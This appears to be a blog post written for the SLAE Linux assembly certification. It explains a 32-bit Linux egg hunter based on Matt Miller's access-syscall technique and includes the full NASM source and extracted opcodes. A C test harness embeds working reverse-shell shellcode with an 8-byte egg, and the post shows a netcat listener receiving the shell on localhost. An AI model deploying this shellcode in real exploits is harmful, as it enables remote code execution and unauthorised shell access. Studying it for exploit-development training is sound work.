SLAE32 0x03: Egg Hunter Shellcode
In the classic stack buffer overflow scenario, execution flow can be redirected to a JMP ESP
instruction which results in the execution of subsequent shellcode on the stack. Say that the goal is to execute a reverse shell shellcode that is 100 bytes in length. If there are at least 100 bytes worth of buffer space remaining after control of execution flow has been obtained (i.e. after the memory address to which a program should resume execution after a function has completed has been overwritten with a pointer to a JMP ESP
instruction), then the shellcode will be stored and executed. If, however, there are less than 100 bytes worth of buffer space after control of execution flow has been obtained, then the reverse shell shellcode will not fit in the remaining available buffer space. This is where the “Egg Hunter” technique might come into play.
Imagine a scenario where a program called chicken
is vulnerable to a stack-based buffer overflow attack. The function within the program that leads to the buffer overflow vulnerability is called calcium
and takes two arguments; egghunter
and eggshell
. The egghunter
argument can be abused to trigger the overflow vulnerability (i.e. the value of the memory address to which program flow should return upon completion of the calcium
function can be overwritten using egghunter
and control of the program can be obtained). After control of the program is gained through this vulnerability, there are only 50 bytes of space remaining in the buffer, so a 100 byte reverse shell shellcode would not fit. The eggshell
argument of calcium
cannot be used to trigger a buffer overflow vulnerability, however up to 200 bytes can be written to memory through this argument. Memory for the egghunter
and eggshell
arguments are allocated in distinct locations.
Through the functionality of calcium
in the chicken
program, a reverse shell shellcode less than 200 bytes in length could be written to memory through the eggshell
argument and an egg hunter shellcode could be injected into memory and executed via the stack buffer overflow caused by the egghunter
argument.
As part of the reverse shell shellcode written to memory via the eggshell
argument, the shellcode would be prepended by a key. This key is commonly referred to as an “Egg”, and is often times 8 bytes in length when implemented in the context of a 32-bit system or process. The 8 byte value that is chosen for the egg is highly unlikely to show up anywhere else in memory by random chance. This means that the shellcode along with the unique egg can be written to memory, however the memory location of this shellcode within virtual address space is unknown.
Using the 50 bytes of buffer space remaining after program control has been obtained via the stack buffer overlow vulnerability caused by the eggshell
argument, an “Egg Hunter” shellcode would injected and excuted. The egg hunter shellcode would search virtual address space for the unique egg value. Once the the location of the egg is found, a JMP
instruction can be used to execute the reverse shell shellcode following the egg.
There is a wealth of information available on the subject, and as such, the demo explained below is based primarily off of the work of Matt Miller. Particularly, the majority of the shellcode outlined below is described in his paper, Safely Searching Process Virtual Address Space, which can be found here. The egg hunter shellcode analysis by FuzzySecurity was also a valuable source of information regarding egg hunter techniques, however the analysis is focused heavily on Windows rather than on Linux. The egg hunter shellcode explanation and analysis from FuzzySecurity can be found here.
The rest of this post will aim to explain, analyze, and demonstrate an egg hunter shellcode inspired by the work of Matt Miller.
Objectives
Create a egghunter shellcode that;
- Create a working demo of the Egg Hunter
- Egg Hunter should be configurable for different payloads
Egg Hunter Shellcode
Explanation
The egg hunter shellcode that will be explained in this section utilizes the access
system call to search virtual address space for the egg value. The system call number for access
is decimal 33
which can be determined from the unistd_32.h
file explained in previous posts.
#define __NR_access 33
From man access
, the access
function checks whether the calling process can access a filename as specified by a pointer to its location in memory. While access
expects two arguments, the egg hunter program functionality is provided by and relies only on the first argument. The two arguments expected by access
are shown below.
int access(const char *pathname, int mode);
If the pointer to the pathname given as argument one points to an area of inaccessible or invalid memory, the EFAULT
error is returned, as detailed below in man access
.
EFAULT pathname points outside your accessible address space.
This is crucial to the egg hunter shellcode, as the return value of the access
systemcall can be examined upon completion to determine whether the egg could possibly be located in the page of memory that includes the specified pointer address. If the access
system call returns EFAULT
, then the egg and the subsequent shellcode is not located in the page of memory. When EFAULT
is returned, access
is used again to validate a memory address in the next page of memory.
As the egg hunter shellcode does its work, access
attempts to access a valid memory page which is determined by the absense of the EFAULT
value returned in EAX
. When a valid memory page is found, the shellcode continues by first increasing the memory address by one, and then by comparing the egg value specfied within the egg hunter shellcode to the egg value prepended to the target shellcode. That is to say, once a valid memory address is found, the value of the valid memory address is increased by one until either the entire range of memory within the page has been searched without the 8 byte egg being found, or until the 8 byte egg value is found as prepended to the shellcode. If the egg is found within the page, the egg hunter shellcode jumps to the shellcode. Otherwise, the process of locating another valid memory address (on a different page of memory) through the access
system call is repeated.
The comparision functionality of the egg hunter shellcode is provided by the string comparison instruction SCASD
. The SCASD
instruction compares the value in EAX
(which will be the first 4 bytes of the egg) to the doubleword at EDI
. In this egg hunter shellcode, a valid memory address as determined by access
as outlined above will be the target for comparison and will be stored in EDI
for this purpose. Additionaly, SCASD
increases the value stored in EDI
by 4 upon completion and sets status flags which can be used to determine the outcome of the comparison.
Through the general processes explained above, the egg will eventually be found in memory and the shellcode immediately following the egg will be executed.
Analysis
The egg hunter shellcode will be explained below. The assembly code will come first, followed by an explanation of the instructions.
xor edx, edx ; clear EDX
First, the EDX
register is cleared using the XOR
instruction. The XOR
instruction has been explained in a previous post. In general terms, when the XOR
instruction specifies the same register for both target and destination, the register will be cleared.
;sets EDX to PAGE_SIZE-1
align_page:
or dx, 0xfff ; sets EDX to fff; e.g. 0x0fff, 0x1fff
inc_address:
inc edx ; increases EDX by one; e.g. 0x1000, 0x2000, 0x2001
The instructions above are referenced by two labels. First, the align_page
label is followed by the OR DX, 0XFFF
instruction. This results in the DX
register being set to fff
which is equal to 4095
in decimal, or PAGE_SIZE-1
. Since PAGE_SIZE
is the smallest unit of data for memory management in virtual address space, it can be assumed that the egg and the subsequent shellcode will exist in one memory page. The instruction following the inc_address
label increases EDX
by one. This label is used multiple times within the complete shellcode and has dual functionality in the sense that it “turns” the page if the address referenced through access
is invalid as well as shifts the SCASD
comparison window by 1 byte when a valid memory page is found.
; preparation for SYS_access
; int access(const char *pathname, int mode);
lea ebx, [edx+0x4] ; pathname
push byte 0x21 ; system call number for access
pop eax ; 0x21
int 0x80 ; software interrupt; returns 0xfffffff2 on EFAULT
Now, the registers are set for the access
system call. Once the memory page has been aligned, its value is stored in EDX
. Therefore, the value of EDX+0x4
is passed as the first argument to access
through EBX
with the intention of testing whether the page is a valid range in virtual address space. Next, the system call number for access
in hexadecimal is pushed to the stack, and immediately removed from the stack and stored in the EAX
register which specifes the access
system call to the following software interrupt INT 0x80
. If the memory address specified in EBX
is invalid, the EFAULT
error value is returned in EAX
.
; compare return value of SYS_access to find writable page
cmp al, 0xf2 ; sets ZF when comparison is true
jz align_page ; jumps to align_page when ZF is set
As the return value of access
is currently in EAX
, the CMP
instruction is used to determine whether the checked memory address accessed by access
is invalid. The CMP
instruction is used to compare the low-byte value in AL
to 0xf2
which is the low-byte value for the EFAULT
error return code. If the value in AL
is equal to 0xf2
, the comparison returns true and the zero flag ZF
is set. The JZ
instruction checks ZF
and if ZF
is set, JZ
jumps to the align_page
label which in turn increases the memory page (and thus the memory address checked by access
), resets the registers for access
, calls the access
system call, and checks the result once again. This loop will continue until the return value of access
is not EFAULT
.
; prepares for egg hunt
mov eax, 0x50905090 ; 4-byte egghunter key
mov edi, edx ; EDX contains memory address of writable page
Once a valid memory address has been located by access
, the value of the first four bytes of the egg are moved into EAX
. In this case, the egg is the 8 byte value \x90\x50\x90\x50\x90\x50\x90\x50
. It is important to note that the first four bytes are identical to the last four bytes. Next, the value in EDX
is moved to EDI
which will later be used by SCASD
for string comparison purposes. The value in EDX
(and now EDI
) is the memory address of the first byte within a valid memory page.
; hunts for first 4 bytes of egg; scasd sets ZF when match is true
scasd ; compares [EDI] to value in EAX; increments EDI by 4
jnz inc_address ; jumps to inc_address when ZF is not set
At this point, SCASD
is used to compare the contents stored at the memory address referenced in EDI
(which on the first iteration of the loop would be the first 4 bytes a valid memory page) to the value in EAX
which is the first four bytes of the egg. If SCASD
returns true (if the contents at EDI
match the value in EAX
), the zero flag ZF
is set. SCASD
then increments the value in EDI
by 4. If the ZF
is not set, (if SCASD
returns false), JNZ
jumps to the inc_address
label, which will utlimately result in the address used for comparison by SCASD
in EDI
to be one memory address higher than the previous iteration. Note that the access
system call happens each time the JNZ
condition is met. This allows the loop to continue for all memory addresses in a valid page. Once the memory address is increased to an invalid page, the access
function will once again return EFAULT
and the align_page
loop will be repeated until a new, valid memory page is located.
; hunts for last 4 bytes of egg
scasd ; hunts for last 4 bytes of egg
jnz inc_address
Once SCASD
returns true, (i.e. once the ZF
flag is set due to the contents at the memory address in EDI
matches 0x50905090
), the next SCASD
string comparison occurs in a similar fashion as described previously. This time, since SCASD
increases EDI
by 4 upon completion, the contents at EDI+0x4
are compared to the value in EAX
. If the contents match, the 8 byte egg has been found. If the contents don’t match, egg hunt continues.
; jumps to beginning of shellcode
jmp edi
Finally, after the egg is found, the JMP
instruction is used to redirect execution to the shellcode. Note that the second SCASD
instruction will result in the memory address that was initially stored in EDI
to be EDI+8
. This means that the JMP EDI
instruction will result in execution continuing beyond the 8 byte egg at the first byte of the shellcode!
Full Code
; egghunter.nasm
; Author: Michael Norris
; Credit: Matt Miller
global _start
section .text
_start:
xor edx, edx ; clear EDX
align_page:
;sets EDX to PAGE_SIZE-1
or dx, 0xfff ; sets EDX to fff; e.g. 0x0fff, 0x1fff
inc_address:
inc edx ; increases EDX by one; e.g. 0x1000, 0x2000, 0x2001
; preparation for SYS_access
; int access(const char *pathname, int mode);
lea ebx, [edx+0x4] ; pathname
push byte 0x21 ; system call number for access
pop eax ; 0x21
int 0x80 ; software interrupt; returns 0xfffffff2 on EFAULT
; compare return value of SYS_access to find writable page
cmp al, 0xf2 ; sets ZF when comparison is true
jz align_page ; jumps to align_page when ZF is set
; prepares for egg hunt
mov eax, 0x50905090 ; 4-byte egghunter key
mov edi, edx ; EDX contains memory address of writable page
; hunts for first 4 bytes of egg; scasd sets ZF when match is true
scasd ; compares [EDI] to value in EAX; increments EDI by 4
jnz inc_address ; jumps to inc_address when ZF is not set
; hunts for last 4 bytes of egg
scasd ; hunts for last 4 bytes of egg
jnz inc_address
; jumps to beginning of shellcode
jmp edi
Compile & Test
Compiling & Examining the Assembly
The egghunter shellcode egghunter.nasm
is compiled as explained in previous posts. The commands used were run on 64-bit Kali Linux. To start, the code should be assembled with /usr/bin/nasm
as shown below. As the program is written in x86 assembly, the elf32
file type is specified using the -f
flag.
root@kali:~/workspace/SLAE# nasm -f elf32 egghunter.nasm -o egghunter.o
With the code assembled, the next step is to link the egghunter.o
file with /usr/bin/ld
. The -m
flag specifies that the elf_i386
emulation linker should be used.
root@kali:~/workspace/SLAE# ld -m elf_i386 egghunter.o -o egghunter
As egghunter
has been compiled and linked, it should now be disassembled into opcodes using /usr/bin/objdump
for further examination. Using the command shown below, the operation codes can be examined for any NULL
characters. The output has been truncated to conserve space.
root@kali:~/workspace/SLAE# objdump -d ./egghunter -M intel
./egghunter: file format elf32-i386
Disassembly of section .text:
08049000 <_start>:
8049000: 31 d2 xor edx,edx
08049002 <align_page>:
8049002: 66 81 ca ff 0f or dx,0xfff
08049007 <inc_address>:
8049007: 42 inc edx
8049008: 8d 5a 04 lea ebx,[edx+0x4]
804900b: 6a 21 push 0x21
804900d: 58 pop eax
804900e: cd 80 int 0x80
8049010: 3c f2 cmp al,0xf2
8049012: 74 ee je 8049002 <align_page>
8049014: b8 90 50 90 50 mov eax,0x50905090
8049019: 89 d7 mov edi,edx
804901b: af scas eax,DWORD PTR es:[edi]
804901c: 75 e9 jne 8049007 <inc_address>
804901e: af scas eax,DWORD PTR es:[edi]
804901f: 75 e6 jne 8049007 <inc_address>
8049021: ff e7 jmp edi
Upon confirmation, the shellcode can be extracted using the bash one-line command outlined in previous posts. The resulting egghunter
shellcode is shown below.
\x31\xd2\x66\x81\xca\xff\x0f\x42\x8d\x5a\x04\x6a\x21\x58\xcd\x80\x3c\xf2\x74\xee\xb8\x90\x50\x90\x50\x89\xd7\xaf\x75\xe9\xaf\x75\xe6\xff\xe7
Demonstrating the Egg Hunter
As demonstrated in previous posts, the sc_test.c
program can be used to test the egghunter
shellcode. As the Egg Hunter technique is a type of staged payload, the egghunter
portion cannot be tested without a complementary shellcode that is prepended by the 8-byte egg as explained earlier in this post. With that being said, the shell_reverse_tcp
reverse shell shellcode from the “Create A Shell_Reverse_TCP Shellcode” paper will be used for this purpose. Additionally, sc_test.c
has been modified to print the length of the egghunter
shellcode as well as the length of shell_reverse_tcp
shellcode prepended with the 8-byte egg.
To test the egghunter
shellcode with a different payload, simply replace the payload contents below the /* Current payload: */
comment with the desired shellcode payload. The source code for this file can be found on GitHub.
#include <stdio.h>
#include <string.h>
/*
To compile:
gcc -m32 -fno-stack-protector -z execstack sc_test.c -o sc_test
*/
unsigned char egghunter[] = \
"\x31\xd2\x66\x81\xca\xff\x0f\x42"
"\x8d\x5a\x04\x6a\x21\x58\xcd\x80"
"\x3c\xf2\x74\xee\xb8\x90\x50\x90"
"\x50\x89\xd7\xaf\x75\xe9\xaf\x75"
"\xe6\xff\xe7";
unsigned char shellcode[] = \
/* Egg */
"\x90\x50\x90\x50\x90\x50\x90\x50"
/* Insert any other payload below */
/* Current payload: Reverse Shell TCP */
"\x31\xdb\xf7\xe3\x52\x6a\x01\x6a"
"\x02\x89\xe1\xfe\xc3\xb0\x66\xcd"
"\x80\x89\xc3\xbf\xff\xff\xff\xff"
"\xb9\x80\xff\xff\xfe\x31\xf9\x51"
"\x66\x68\x11\x5c\x66\x6a\x02\x89"
"\xe1\x6a\x10\x51\x53\x89\xe1\xb0"
"\x66\xcd\x80\x89\xd1\xb0\x3f\xcd"
"\x80\xfe\xc1\xb0\x3f\xcd\x80\xfe"
"\xc1\xb0\x3f\xcd\x80\x52\x68\x2f"
"\x2f\x73\x68\x68\x2f\x62\x69\x6e"
"\x89\xd1\x89\xe3\xb0\x0b\xcd\x80";
int main(void)
{
printf("Egghunter Length: %d\n", strlen(egghunter));
printf("Shellcode Length: %d\n", strlen(shellcode));
int (*ret)() = (int(*)())egghunter;
ret();
}
As explained in the testing of shell_reverse_tcp
, the same general steps should be taken here to test the egghunter
shellcode. If the egghunter
shellcode successfully locates the egg that prepends shell_reverse_tcp
, a reverse shell will be returned to the listening system on a specified IP address and port. The entire process is outlined again below.
The above program is compiled using the command shown below, as suggested in the commented program code.
root@kali:~/workspace/SLAE# gcc -m32 -fno-stack-protector -z execstack sc_test.c -o sc_test
Before sc_test
is executed, a nc
or ncat
listener should be set up in a seperate terminal window to act as the remote system to which the reverse shell should connect to.
root@kali:~/workspace/SLAE# nc -lvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
The default IP address used in the shell_reverse_tcp
shellcode is 127.0.0.1
and the default listening port is 4444
. Once the listener is configured, running sc_test
results in a shell on the system, which confirms that the egghunter
shellcode succesfully located the shell_reverse_tcp
shellcode prepended by the \x90\x50\x90\x50\x90\x50\x90\x50
egg.
In the terminal window that runs sc_test
:
root@kali:~/workspace/SLAE# ./sc_test
Egghunter Length: 35
Shellcode Length: 96
And in the terminal window that runs nc
:
root@kali:~/workspace/SLAE# nc -lvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 127.0.0.1.
Ncat: Connection from 127.0.0.1:41410.
ls -lah | grep egghunter
-rwxr-xr-x 1 root root 4.5K Oct 13 22:17 egghunter
-rw-r--r-- 1 root root 489 Oct 13 22:17 egghunter.nasm
-rw-r--r-- 1 root root 512 Oct 13 22:17 egghunter.o
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert
Student ID: SLAE-1469